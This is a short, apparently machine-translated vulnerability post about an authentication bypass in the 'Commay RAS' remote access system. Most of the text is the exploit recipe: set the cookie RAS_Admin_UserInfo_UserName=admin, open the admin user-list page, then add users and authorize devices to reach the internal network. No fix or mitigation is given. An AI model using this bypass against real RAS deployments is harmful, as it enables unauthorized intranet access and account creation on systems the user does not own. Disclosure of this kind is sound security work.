Comma Ras System Cookie Verification Overdue Vulnerability
Comma Ras System Cookie Verification Overdue Vulnerability
Commay RAS system Cookie verification overdue vulnerability
Vulnerability Description
The Cookie verification is overridden in the RAS system. When RAS_Admin_UserInfo_UserName is set to admin, the background can be accessed.
Vulnerability Impact
Commay RAS system
Network surveying and mapping
Vulnerability reappears
The login page is as follows
Add Cookies
RAS_Admin_UserInfo_UserName=admin
Visit /Server/CmxUser.php?pgid=UserList
After obtaining, you can add users and authorize the login device to directly access the intranet.
This post is licensed under CC BY 4.0 by the author.